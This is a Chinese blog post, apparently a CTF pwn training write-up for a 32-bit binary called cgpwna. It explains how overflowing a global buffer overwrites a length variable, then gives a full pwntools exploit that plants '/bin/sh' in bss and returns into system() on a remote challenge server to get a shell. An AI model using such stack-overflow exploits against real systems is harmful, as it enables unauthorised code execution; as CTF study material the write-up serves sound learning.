pwn暑假训练(六) cgpwna

最新推荐文章于 2024-08-17 00:19:53 发布
最新推荐文章于 2024-08-17 00:19:53 发布
阅读量354 收藏
点赞数
分类专栏: 学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/98885439
版权

这道题是个32位栈溢出
fget()是一个安全的函数很难溢出

int message()
{
  char s; // [esp+18h] [ebp-30h]

  n = 10;
  puts("you can leave some message here:");
  fgets(A, 60, stdin);
  puts("your name please:");
  fgets(&s, n, stdin);
  return puts("Thank you");
}

这就是漏洞函数我们需要覆盖n来操作下一步的栈溢出
首先我们先看到A在bss段

.bss:0804A064                                         ; __do_global_dtors_aux+14↑w
.bss:0804A065                 align 20h
.bss:0804A080                 public A
.bss:0804A080 ; char A[40]
.bss:0804A080 A               db 28h dup(?)           ; DATA XREF: message+2D↑o
.bss:0804A0A8 ; int n
.bss:0804A0A8 n               dd ?                    ; DATA XREF: message+6↑w
.bss:0804A0A8                                         ; message+4B↑r
.bss:0804A0AC                 align 20h
.bss:0804A0C0                 public choice
.bss:0804A0C0 ; char choice
.bss:0804A0C0 choice          d

看到A是个字符串后它与a定义的bss地址相差40所以我们应该可以覆盖n来造成栈溢出
然后后门函数也给了只是少了/bin/sh我们就输入呗直接上exp:

from pwn import *
p=remote('182.254.217.142',10001)
#p=process('../cgpwna')
elf=ELF('../cgpwna')
bss_addr=0x0804A080
system_addr=0x080483F0
offset=0x30+0x4
payload='a'*40
payload+=p32(80)
payload+="/bin/sh"
p.recvuntil('your choice:')
p.sendline('1')
p.recvuntil('you can leave some message here:')
p.sendline(payload)
p.recvuntil('your name please:')
payload2='a'*offset+p32(system_addr)+"aaaa"+p32(bss_addr+44)
p.sendline(payload2)
p.interactive()

~~pwn好难

doudoudedi
关注
专栏目录
Vue-快餐收银系统-pos.vue
yangshengzhen的专栏
06-03 2439
学习之中遇到一个坑 源代码里面是scope=“scope”,然而slot-scope vue2.5版本中取代了scope。 <el-table :data="tableData" border show-summary style="width: 100%" > <el-table-column prop="goodsName" label="商品" >&...
Vue-快餐店收银系统-leftNav.vue&Pos.vue
yangshengzhen的专栏
06-02 1577
一好友推荐学习vue的一个博客 网址共享:http://jspang.com/ 这是比较基础的课程 技术胖用的是live-server来搭建服务器环境的,推荐以下链接:https://www.cnblogs.com/LSG2/p/6228520.html 如果npm install -g live-server安装报错就用npm install live-server -gf安...
Vue实战实例-快餐店收银系统
12-17
这个系统使用的技术栈为:Vue+Webpack+Element+Axios+vueRouter.系统是一个快餐店的POS系统
实战笔记
weixin_30834783的博客
02-23 359
第1节:Mockplus把我们的想法画出来 Mockplus是产品经理装逼使用的利器,但是真的很好用,作为一个已经工作的程序员必须舔产品经理的脸,所以你也要对Mockplus的使用有所了解,并会简单的使用。其实Mockplus就是一个线框图制作工具,能把我们的想法或者不太好用语言表达的地方,快速画出线框草图增加理解能力。 为什么选择快餐店POS系统? 刚开始我想作一套以酒水商城为...
基于ssm+vue便利店收银管理系统【开题+程序+论文】
sheji405的博客
08-17 1414
随着消费者需求的多元化与购物习惯的快速变化,便利店作为零售业的重要一环,其日常运营面临着前所未有的挑战。通过该系统,旨在实现便利店日常运营的全面数字化、自动化与智能化,提高收银效率,降低运营成本,优化顾客购物体验,并为便利店管理者提供科学、准确的数据支持,助力其做出更加合理、高效的经营决策,最终推动便利店行业的持续健康发展。[8] 陆建平, 张小龙, 翁凯迪, 丁志千, 傅书畅, 赵大禹. 基于Java的储罐安全管理平台设计与实现[J]. 化工装备技术, 2021, 42 (04): 34-38。
vue收银系统
qq_25327339的博客
10-17 597
/ 1. 明确需求, html+css。// 2. 数据准备好变量, 用到页面上。// 3. 点击事件交互效果。// 4. 实现计算过程。
Vue-pos收银系统demo
09-20
Vue实战,pos收银系统Demo。
vue-pos:一个简单的练习作品,仿快餐店收银界面
05-17
构建设置 # install dependencies npm install # serve with hot reload at localhost:8080 npm run dev # build for production with ...Vue-Cli Vue Vue路由器 ES6 Axios 元素—UI 感谢胖哥提供的后台接口
基于Vue.js和JavaScript的快餐店收银系统设计源码
最新发布
09-27
该项目是一款基于Vue.js和JavaScript构建的快餐店收银系统源码,包含27个文件,涵盖了13个JavaScript脚本、4个Vue组件、2个PNG图片、2个JSON配置文件、以及相关的HTML、Babel配置、Git忽略规则和Markdown文档等。...
Fastfoodstorecashregistermodule快餐店收银模块Vue20
08-09
总的来说,"Fastfoodstorecashregistermodule"通过Vue2.0的强大功能,构建了一个高效、易用的快餐店收银系统。它不仅展示了Vue2.0在前开发中的卓越性能,也为其他类似项目提供了可借鉴的开发思路和技术实践。通过...
基于vue做的一个快餐店收银系统(适合刚入门的人看)
07-22
首先在这里特别感谢下技术胖,这份代码我也是出入门时跟着技术胖的视频学习写的。今天分享出来,是想给想要将来做前的朋友们一起来学习最新的前技术。
pos-by-vue:收银系统
03-11
<<<<<<< HEAD pos-vue 使用vuevue路由器,vuex,axios,elemet-ui开发的pos点餐系统 构建设置 # install dependencies npm install # serve with hot reload at localhost:8080 npm run dev # build for production with minification npm run build # build for production and view the bundle analyzer report npm run build --report 有关工作原理的详细说明,请查看的和。 逐位 收银系统 15498698cd0481313b5efabcc17188f2ca700b2c
基于ssm+Vue的在线收银系统(源码+部署说明+系统介绍+数据库).zip
06-10
这是一个基于SSM(Spring + Spring MVC + MyBatis)框架和Vue.js的在线收银系统项目。该项目包含了源代码、部署说明、系统介绍以及数据库设计。以下是关于这个项目的简要介绍:源码:本项目提供了完整的源代码,包括前Vue.js应用和后SSM框架。这使得开发者可以轻松地理解和修改代码,以满足自己的需求。部署说明:项目中提供了详细的部署说明,指导开发者如何将项目部署到服务器上。部署过程中需要配置数据库连接信息、调整服务器环境等。通过阅读部署说明,开发者可以顺利完成项目的部署工作。系统介绍:项目简介部分详细介绍了在线收银系统的功能和特点。该系统支持多种支付方式,如微信支付、支付宝支付等,同时具备商品管理、订单管理、用户管理等功能。此外,系统还具有一定的安全性和稳定性,能够满足企业级的应用需求。数据库设计:项目中的数据库设计文件详细描述了数据库表结构和关系。这些表包括用户表、商品表、订单表等,用于存储系统中的各种数据。通过对数据库的设计,开发者可以更好地理解系统的架构和数据流程。总之,这个基于SSM+Vue的在线收银系统项目为开发者提供了一个完整的解决方案,可以帮助他们快速搭建一个功能丰富、性能稳定的在线收银系统。通过阅读源码、部署说明和数据库设计文件,开发者可以深入了解项目的实现细节,从而提高自己的开发能力。
Vue-POS-客户
02-26
黑森林格栅 简单的PWA,它将利用以下技术堆栈 前框架-Vue.js UI框架-Quasar数据库-MongoDB身份验证处理程序-Auth0服务器-Node.js + Express通知服务器-网络推送支付网关-mobiPaid ** TBC 该应用程序的详细说明-如果您不确定某个简单的PWA是一种简单的PWA描述方式,那么该简单的PWA将为餐厅而设计-它使用户能够下载该网站,而该网站又会像本机一样工作在独立容器中打开应用程序。 通过创建PWA,我们可以确保跨平台可用性,而不必使用专用的android / iOS应用程序,并且可以确保响应式设计。 用户将能够像往常一样浏览网站,查看菜单,联系电话,在移动或台式机上任何平台上的开放时间。 用户还可以注册并登录,从而可以订购食物,如果需要,可以显示每个项目,从而使用户可以对特定项目进行更改,例如在合适的地方删除配料或将配料添加到菜肴中
商品后台管理系统(包含收银系统
10-26
完整后服务,包含数据库脚本。 包含 基本的核销、库存、订单、销售统计功能,可满足实际需求。 技术栈:前 @vue/cli 后: nodejs14.x+koa2 数据库:mysql 5.7.0 预览地址: http://49.235.109.180:3000/#/login 前二开请下载 https://download.csdn.net/download/qq_39393899/19425140
Vue快餐店收银系统
lyh
01-16 1004
一个简易的快餐店收银系统Vue+Axios+ElementUI)
Vue-cashierSystem: 基于Vue.js构建的智能收银系统
gitblog_00018的博客
04-23 672
Vue-cashierSystem: 基于Vue.js构建的智能收银系统 项目地址:https://gitcode.com/imloren/Vue-cashierSystem 项目简介 Vue-cashierSystem 是一个由Vue.js驱动的开源收银系统,旨在为小型企业、餐厅和零售店提供轻量级且功能强大的销售管理解决方案。该项目采用现代Web技术栈构建,注重用户体验,并提供了丰富的API接口...
vue springboot 会员收银系统
qq_35238367的博客
12-02 1223
收银系统 多门店管理 会员管理系统 门店营销系统 。支持单门店 和多门店。 主要功能有 1会员管理2 商品管理 3会员卡管理 4库存管理 5统计分析 6微信营销 。适用于市面常见 美发 养生 商品 等各个行业 。支持会员公众号 消费推送 ,查询 门店经营 和消费记录 有演示地址,可以直接 在线试用, 代码完全自己开发没有侵权风险 后有代码截图 vue ➕ springboot 也支持商业合作。 ...
springboot vue 开源 会员收银系统 (1)
qq_35238367的博客
08-05 637
从零开发 springboot vue 开源会员收银系统
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值